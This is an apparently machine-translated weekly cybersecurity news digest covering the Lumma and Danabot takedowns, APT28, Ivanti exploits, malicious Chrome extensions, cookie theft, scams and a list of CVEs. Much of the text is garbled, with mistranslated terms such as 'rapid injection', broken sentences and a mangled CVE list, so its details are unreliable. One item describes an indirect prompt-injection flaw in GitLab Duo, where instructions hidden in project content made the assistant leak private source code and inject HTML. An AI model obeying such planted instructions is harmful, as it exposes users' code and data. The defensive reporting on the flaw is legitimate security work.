APT Campaigns, Browser Hijacking, AI Malware, Cloud Breach, Important CVE

Table of Contents

Cyber threats do not appear one at a time. They are layered, planned and remain hidden until it’s too late.

For cybersecurity teams, keys don’t just respond to alerts. It finds early signs of trouble before it becomes a real threat. This update is designed to provide clear and accurate insights based on the actual patterns and changes you can see. With today’s complex systems, intensive analysis is required, not noise.

What we see here is a clear look at not only the list of incidents, but also where controls are acquired, lost and quietly tested.

⚡This week’s threat

Lumma Stealer, Danabot Operations confused – A coalition of private companies and law enforcement has removed infrastructure related to Lumma Stealer and Danabot. Additionally, claims have been sealed against 16 individuals on alleged involvement in the development and deployment of Danabot. Malware can siphon data from victim computers, hijack bank sessions, and steal device information. But more uniquely, Danabot has also been used to hack campaigns that appear to be related to Russian state-sponsored interests. It all serves as a particularly clear example of how Danabot was reused for his own goals by hackers in the Russian province. In tandem, approximately 2,300 domains acting as command and control (C2) backbone for Lumma Information Stealer were seized, removing 300 servers and neutralizing the 650 domains used to launch ransomware attacks. International cybercrime actions over the past few days constituted the latest phase of operation.

🔔Top News

Threat officials will distribute steelers using Tiktok videos – Clickfix has become a popular social engineering tactic for delivering malware, but threat actors are observed using artificial intelligence (AI)-generated videos uploaded to Tiktok, users are running malicious commands on their systems, deploying malware such as Vidor and Stealc, deploying malware and Stealc under the activation of useful versions of Windows, Microsoft, Capcut and Spotify. “The campaign highlights that attackers are ready to weaponize the currently popular social media platforms for distributing malware,” Trend Micro said.
APT28 Hackers target Western logistics and tech companies – Several cybersecurity and intelligence agencies from Australia, Europe and the US have issued joint warnings for state-sponsored campaigns targeting logistics entities and technology companies in the Russian state-sponsored threat actor APT28 West. We will be close to Ukraine and the NATO countries,” the agency said. The attack is designed to steal sensitive information and maintain the long-term persistence of the compromised host.
China’s threat actors exploit the flaws of Ivanti EPMM – Tracked as UNC5221, the Chinese and Nexus Cyberspy Group is attributed to the exploitation of a pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software (CVE-2025-4427 and CVE-2025-4428), covering a wide range of sectors across Europe, North America and Asia. Intrusions exploit the vulnerability to obtain a reverse shell and drop malicious payloads like KrustyLoader. KrustyLoader is known to provide a Sliver Command and Control (C2) framework. “UNC5221 demonstrates a deep understanding of the internal architecture of EPMM and reuses legitimate system components for the removal of confidential data,” Eclecticiq said. “Given the role of EPMM in managing and pushing configurations to enterprise mobile devices, successful exploitation allows threat actors to remotely access, manipulate, or compromise thousands of managed devices across their organization.”
Over 100 Google Chrome extensions mimic popular tools – Unknown threat actors have been pretending to be seemingly benign utilities like Deepseek, Manus, Debank, Fortivpn, and site statistics since February 2024, but are attributed to creating some malicious Chrome browser extensions, pretending to be seemingly benign utilities that remove secret features, receive commands, and run arbitraryardary. Links to these browser add-ons are hosted on specially created sites where users are likely to be redirected via phishing or social media posts. The extension appears to provide the functionality that is being advertised, but also secretly promotes phishing with qualifications and cookie theft, session hijacking, ad injection, malicious redirects, traffic operations, and DOM operations. Some of these extensions have been removed by Google.
CISA warns about SaaS providers for attacks targeting cloud environments – The US Cybersecurity and Infrastructure Security Agency (CISA) warned that SaaS companies are under threat from bad actors wandering around in cloud applications with default configurations and elevated permissions. The agency did not attribute the activity to any particular group, but the advisory said the enterprise backup platform Commvault is monitoring cyber threat activity targeting applications hosted in a Microsoft Azure Cloud environment. “The threat actor may have accessed the client secret for the Commvault (Metallic) Microsoft 365 (M365) Backup Software (SAAS) solution. “This has led to unauthorized access to the M365 environment of Commvault customers, which has the secrets of the applications they store.”
You can inject malicious code using gitlab ai coding assistant flaw – Cybersecurity researchers have discovered an indirect rapid injection flaw from Gitlab’s artificial intelligence (AI) assistant duo that may have allowed attackers to steal source code and inject unreliable HTML into their responses. Attacks can also leak sensitive issue data, such as details about zero-day vulnerabilities. What’s needed is for an attacker to take advantage of the fact that GitLab Duo has extensive access to the platform and instruct the chatbot to interact with merge requests (or commit, issue, or source code). “Embedded instructions hidden in seemingly harmless project content allowed us to manipulate the duo’s behavior, remove private source code, and demonstrate how we could leverage AI responses in unintended, harmful outcomes.” One variation of the attack included hiding malicious instructions in legitimate source code, but another duo asynchronously analysing markdown responses in real time. Attackers can take advantage of this behavior. The duo starts rendering the output line by line rather than generating the entire response and sending it all at once – introducing malicious HTML code that can access sensitive data and remove information to a remote server. This issue has been patched by GitLab following responsible disclosure.

Pean Trend CVE

Software vulnerabilities continue to be one of the simplest and most effective entry points for attackers. New flaws are discovered each week, and even a small delay in patching can escalate into a serious security incident. To move on means to act fast. Below is a list of high-risk vulnerabilities that require caution this week. Check them carefully, apply updates without delay, and close the door before it is forced.

This week’s list includes CVE-2025-34025, CVE-2025-34026, CVE-2025-34027 (Versa Concerto), CVE-2025-30911 (Romethemekit, Elementor WordPress plugin), CVE-2024-57273, CVE-2024-54780 (PFSENSE), CVE-2025-41229 (VMware Cloud Foundation), and CVE-2025-4322 (Motors) WordPress theme), CVE-2025-47934 (OpenPGP.JS), CVE-2025-30193 (PowerDNS), CVE-2025-0993 (GITLAB) (AutomationDirect MB-Gateway), CVE-2025-47949 (Samlify), CVE-2025-40775 (Bind DNS), CVE-2025-20152 (Cisco Identity Services Engine), CVE-2025-4123 (Grafana), CVE-2025-5063 (Google Chrome), CVE-20259) (Linux Kernel), CVE-2025-26817 (NetWrix Password Secure), CVE-2025-47947 (ModSecurity), CVE-2025-3078, CVE-2025-3079 (CVE-2025-3079 (CVE-2025-4978 (Netgear)).

Cyber Around the world of cyber

Sandworm drops new wipers in Ukraine – Sandwarm groups lined up in Russia deployed a new wiper named Zero Lot to intensify their disruptive operations against Ukrainian energy companies. “The infamous sandworm group focused on compromises in Ukraine’s energy infrastructure. In recent years, they deployed Ukrainian Zero Lot Wiper, which led the attackers to abuse the Active Directory Group Policy of the affected organization.” Another Russian hacking group, Gamalen, has introduced Pterobox, a file steeler that targets Eastern European countries, which has stepped up malware obfuscation and leverages dropboxes.
The signal says no to remember – Signal has released a new version of the messaging app for Windows. By default, Windows blocks the ability to use recalls to regularly take screenshots of apps. “Microsoft has made some adjustments over the last 12 months in response to important feedback, but the improved version of Recall still places content displayed within apps that provide privacy, such as risky Signal,” says Signal. “As a result, despite introducing some usability trade-offs, it allows an additional layer of protection by default in Windows 11 to maintain the security of signal desktops on that platform. Microsoft has not given any other options.” Microsoft officially began rolling out recalls last month.
Russia is introducing new laws to track foreigners using smartphones – The Russian government has introduced a new law that requires tracking apps to all foreigners in the Moscow region. This includes gathering real-time locations, fingerprints, face photos and housing information. “The mechanism adopted will allow modern technology to be used to enhance control in the field of migration and will also contribute to reducing the number of violations and crimes in the region,” said Vicheslav Voldin, chairman of the state Duma. “If an immigrant changes his actual residence, he must notify the Ministry of Home Affairs (MVD) within three business days.” The proposed four-year trial period begins on September 1, 2025 and runs until September 1, 2029.
The Dutch government passes laws to criminalize cyber espionage – The Dutch government has approved a law that criminalizes a wide range of espionage activities, including digital espionage, to protect national security, critical infrastructure and high-quality technologies. Under the amended law, confidential information is also leaked that is not classified as state secrets on behalf of foreign governments that may harm the interests of the Netherlands, or that is not engaged in activities on behalf of foreign governments. “Foreign governments are also interested in sensitive, non-state secret information about specific economic sectors and political decision-making,” the government said. “This kind of information can be used to influence political processes, weaken the Dutch economy, or to ally with each other. Spying can include actions other than sharing information.”
Microsoft announces availability of quantum resistance algorithms to symcrypt – Microsoft has revealed that it is creating post-Quantum encryption (PQC) features including ML-KEM and ML-DSA available on Windows Insider, Canary Channel Build 27852 and above, Linux, and Symcrypt-OpensSL version 1.9.0. “This advancement will allow customers to begin investigating and experimenting with PQCs within their production environment,” Microsoft said. “Getting early access to PQC capabilities allows organizations to actively evaluate compatibility, performance and integration of these new algorithms along with their existing security infrastructure.”
New malware doubleloader uses Alcatraz for obfuscation – Open Source Obfuscator Alcatraz will be found within a new generic loader called DoubleLoader, which has been rolling out alongside Rhadamanthys Stealer infection since December 2024. The malware collects host information, requests an updated version, and initiates a beacon to a hardcoded IP address. “Esoteric people like Alcatraz will increase the complexity of malware when triaging,” Elastic Security Lab said. “Their main goal is to disrupt binary analysis tools and increase the time for the reverse engineering process through various techniques, such as hiding control flows and making it difficult to follow decompilation.”
The new Formjack campaign targets the WooCommerce site – Cybersecurity researchers have detected sophisticated formjack campaigns targeting WooCommerce sites. With each word fence, malware injects fake but professional payment forms into the legitimate checkout process and removes sensitive customer data to external servers. Further analysis revealed that infections are likely to stem from compromised WordPress management accounts. This was used to inject malicious JavaScript via simple custom CSS and JS plugins (or similar) that allow administrators to add custom code. “Unlike traditional card skimmers that simply overlay existing forms, this variant is carefully integrated with the design and payment workflow of WooCommerce sites, making it particularly difficult for site owners and users to detect,” the WordPress security company said. “The authors of malware reuse the browser’s local storage mechanism – usually used to remember users’ preferences on websites – quietly storing stolen data and maintaining access even after page reloads or when leaving the checkout page.”

EU Sanctions Stark Industries – The European Union has announced sanctions against 21 Russian people and six entities over “destabilizing actions” in the region. One of the authorized entities is Stark Industries, a bulletproof hosting provider that has been accused of “the enablers of various state support in Russia and related parties to carry out unstable activities, including interfering with information manipulation and cyberattacks against unions and third countries.” The sanctions also cover CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries previously highlighted the independent cybersecurity journalist Brian Krebs, detailing its use in DDOS attacks in Ukraine and Europe. In August 2024, Team Cymru said it had discovered 25 strictly allocated IP addresses used to host domains associated with FIN7 activity and had been working with Stark Industries for several months to identify and reduce system abuse. The sanctions target Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming and civil aviation disruptions in the Baltic countries.
Masks not masked as if bound by the Spanish government -A report released by The TechCrunch identifies the mysterious threat actor known as The Mask (aka Careto) as being run by the Spanish government. The Russian cybersecurity company first exposed the hacking group in 2014, and has linked it to a highly sophisticated attack since at least 2007 targeting well-known organizations such as governments, diplomatic groups and research institutions. The majority of the group’s attacks targeted Cuba, followed by hundreds of casualties in Brazil, Morocco, Spain and Gibraltar. Kaspersky has not publicly attributed it to any particular country, but the latest revelation makes the mask one of the few Western government hacking groups that have been openly discussed to date. This includes the Equation Group, Lambert (USA), and Animal Farm (France).
Social Engineering Scams Target Coinbase Users – Earlier this month, Cryptocurrency Exchange Coinbase revealed that by bribeing the funds of Indian customer support agents and Siphon, they are victims of a malicious attack in which unknown threat actors violate their systems. According to blockchain security company Slowmist, Coinbase users have been targeting social engineering fraud since the beginning of the year with SMS messages claiming they were a target for social engineering fraud and a false withdrawal request, asking for confirmation as part of a “persistent and organized fraud campaign.” The goal is to induce false sense of urgency, trick them into calling numbers, and ultimately transfer funds to a secure wallet with seed phrases pre-generated by the attacker, and convince them to eventually drain the assets. The activity is rated primarily by two groups: low-level skid attackers in the COM community and an organization of India-based cybercrime groups. “Using a spoofed PBX phone system, the scammers are spoofing Coinbase support, claiming that users’ accounts have “unauthorized access” or “suspecting withdrawals,” Slowmist said. “They create a sense of urgency and follow up with phishing emails or texts that contain fake ticket numbers or ‘recovery links’. ”
Delta can sue cloud strike over mega suspension in July 2024 – Delta Air Line, which was crippled by a massive outage due to a false update issued by Cloud Strike in mid-July 2024, has now been given green light to pursue lawsuits against cybersecurity companies. A Georgia judge says Delta can try to prove that cloud strike is grossly negligent by pushing flawed updates to Falcon software onto customers. This update crashed 8.5 million Windows devices worldwide. Crowdstrike previously claimed that the airline had rejected offers of technical support from both itself and Microsoft. In a statement shared with Reuters, the attorney representing Crowdstrike said “the judge is either convinced that there is no merit in the Delta case or will limit damages to “single-digit millions” under Georgia law.” The development comes months after MGM Resorts International agreed to pay $45 million to resolve multiple class action lawsuits related to the 2019 data breaches, and it took place in 2023.
Storm-1516 uses AI-generated medium to spread disinformation -The Russian influence operation, known as Storm-1516 (aka Copycop), sought to spread the narrative that undermines European support for Ukraine by amplifying counterfeit stories about European leaders using drugs while traveling to Kyiv by train for peace talks. Later, Maria Zakkarova, a senior official in the Russian state media and Russia’s Foreign Ministry, was shared as part of what has been described as a coordinated disinformation campaign by eclecticiq. The activity is also noteworthy as French President Emmanuel Macron, British Labour leader Kiel Starmer and German Prime Minister Friedrich Merz use integrated content on drug possession on his return from Ukraine. “By attacking the reputation of these leaders, the campaign was likely aimed at hostile their voters against them, and was aiming to reduce the support of the Ukrainian people by using an impact operation (IO) to trust the politicians who support it.”
Turkey users targeted by dbatloader – Ahnlab has revealed details of a malware campaign that distributes a malware loader called DBATLoader (aka Modiloader) via bank-themed bank emails. “The DBATLoader malware distributed through phishing emails has the unning behavior of utilizing the usual processes (Easinvoker.exe, loader.exe) through techniques such as DLL sideloading and injection of most actions, and will change policies,” the company said.
SEC SIM-SWAPPER declared 14 months in SEC X account hack – Eric Council Jr., a 26-year-old Alabama man, has been sentenced to 14 months in January 2024 for using a SIM exchange attack in violation of the official Securities and Exchange Commission (SEC) X account, and has misrepresented SEC-approved Bitcoin (BTC) Exchange Funds (ETFS). Council Jr. (aka Ronin, Agiantz Chanoser, @easymunny) was arrested in October 2024 and pleaded guilty to the crime in early February this year. He is also ordered to confiscate $50,000. According to court documents, the council uses his personal computer to ensure that they know for certain whether they are being investigated by the FBI, or whether they are being investigated by the FBI, or that the FBI hasn’t contacted them, even if the FBI says “”” statute, “and “How long will it take to delete your Telegram account?”
The FBI warns about malicious campaigns that are pretending to be government officials – The US Federal Bureau of Investigation (FBI) has warned of a new campaign since April 2025 involving high-ranking US federal or state government officials and their contacts that have malicious stakeholders targeting individuals. “One way an actor can gain such access is to send targeted individuals malicious links under the guise of moving to another messaging platform.” From there, actors can present malware or introduce hyperlinks that direct their intended targets to actor-controlled sites that steal login information.
A flaw in DICOM allows attackers to embed malicious code in medical image files – Praetorian has released a proof of concept (POC) for high-strength security flaws in digital imaging and medical communication (DICOM), the leading file format for medical imaging. Originally disclosed by Markel Picado Ortiz in 2019, CVE-2019-11687 (CVSS score: 7.8) comes from a design decision that allows for any content at the start of a file. Codenamed Elfdicom, the POC extends its attack surface into a Linux environment, making it a much stronger threat. As a mitigation, we recommend implementing DICOM Preamble Whitelist. “DICOM’s file structure allows essentially any bytes at the beginning of a file where Linux and most operating systems are looking for magic bytes,” said Praetorian researcher Ryan Hennessee. “(The whitelist) checks the preamble in the DICOM file before it is imported into the system. This allows for good known patterns such as “TIFF” magic bytes and “X00” null bytes, but files with ELF magic bytes will be blocked. ”
Cookie-Bite Attack steals session tokens using Chrome Extension – Cybersecurity researchers have demonstrated a new attack technique called Cookie-Bite, which uses custom-made, malicious browser extensions to steal “Estauth” and “EstsauthPersistnt” cookies for Microsoft Azure Entra IDs and bypass multi-factor authentication. The attack has multiple moving parts. A custom chrome extension that monitors authentication events and captures cookies. PowerShell scripts that automate extensions and ensure persistence. Removal mechanism for sending cookies to remote collection points. A complementary extension for injecting captured cookies into the attacker’s browser. “Threat actors often use infosealers to extract authentication tokens directly from the victim’s machine or purchase directly through the darkness market, allowing enemies to hijack active cloud sessions without triggering MFA,” Valonis said. “By injecting these cookies while mimicking the victim’s OS, browser and network, attackers can avoid conditional access policies (CAPS) and maintain permanent access.” Authentication cookies are stolen using the Rogue browser extension, which requires excessive permissions to use Intermediate (AITM) phishing kits in real time, interact with web sessions, modify page content, and extract stored authentication data. Once the installation is installed, the extension can access the browser’s storage API, intercept network requests, and insert malicious JavaScript into the active session to harvest real-time session cookies. “By leveraging stolen session cookies, enemies can bypass the authentication mechanism and obtain seamless entries into the cloud environment without the need for user credentials,” says Varonis. “Beyond initial access, hijacking sessions encourages lateral movement across the tenant, allowing attackers to explore additional resources, access sensitive data, and escalate privileges by abusing existing authorizations or misunderstood roles.”

🎥Cybersecurity Webinar

Nonhuman Identity: AI Backdoors you don’t see → AI agents rely on nonhuman identities (such as service accounts and API keys) to function, but these often remain untracked. The risk is increasing rapidly as attackers shift their focus to this hidden layer. This session will teach you how to find, secure and monitor these identities before they are misused. Join the webinar to understand the real risks behind AI adoption and how to stay ahead.
Lot’s Internal Playbook: How Hackers Are Not Detected → Attackers remain hidden using trusted sites. In this webinar, Zscaler experts share how they detect these stealth slot attacks using insights from the world’s largest security cloud. Join us to find hidden threats and learn how to improve your defense.

🔧Cybersecurity Tools

ScriptSentry→This is a free tool that scans your environment for incorrect differences in dangerous logon scripts, such as plain text credentials, unstable file/sharing permissions, and references to non-existent servers. These often overlooked issues allow lateral movement, privilege escalation, or even theft of qualifications. ScriptSentry helps you quickly identify and fix them in large Active Directory environments.
Aftermath → MACOS is a fast, open source tool for responding to incidents. Collects forensic data from compromised systems, including logs, browser activity, and process information, and analyzes it to build a timeline and tracks the infection route. Deploy via MDM or run it manually. It’s fast and lightweight, making it ideal for post-intertwining investigations.
AI Red Teaming Playground Labs → This is an open source training suite with hands-on challenges designed to teach security professionals how to do Red Team AI Systems. Originally developed for Black Hat USA 2024, the lab covers rapid injection, safety bypass, indirect attacks, and responsible AI failures. Built on Chat Copilot and deployable via Docker, this resource is a practical resource for testing and understanding real AI vulnerabilities.

🔒Tip of the Week

Check and revoke permissions for old OAuth apps – they are silent backdoors → You may have logged in to the app using “Continue Google”, “Sign in with Microsoft”, or Github/Twitter/Facebook logins. That’s oauth. But did you know that many of these apps can still be accessed since they no longer use data?

Why is it important:

You may still have continuous access to your calendar, email, cloud files, or contact lists, even if you delete an app or forget it existed. No password is required. If that third party is compromised, your data is at risk.

What to do:

Check out the connected apps here:
Google: myaccount.google.com/permissions
Microsoft: Account.Live.com/Consent/Manage
github:github.com/settings/applations
Facebook: facebook.com/settings? tab = applications

Cancel any items that are not actively used. It’s a quick and quiet cleanup – and then close the door you didn’t know.

Conclusion

Looking ahead, it’s not just about tracking threats. It’s about understanding what they reveal. All tactics in which all tested systems are used show deeper questions about how trust, access, and visibility are managed. As the attacker adapts quickly, the defender needs a sharper recognition and a faster response loop.

This week’s takeaway isn’t just technical. They talk about how teams prioritize risk, prioritize design safeguards, and make choices under pressure. Use these insights to not only respond, but also rethink what “secure” really needs to mean in today’s environment.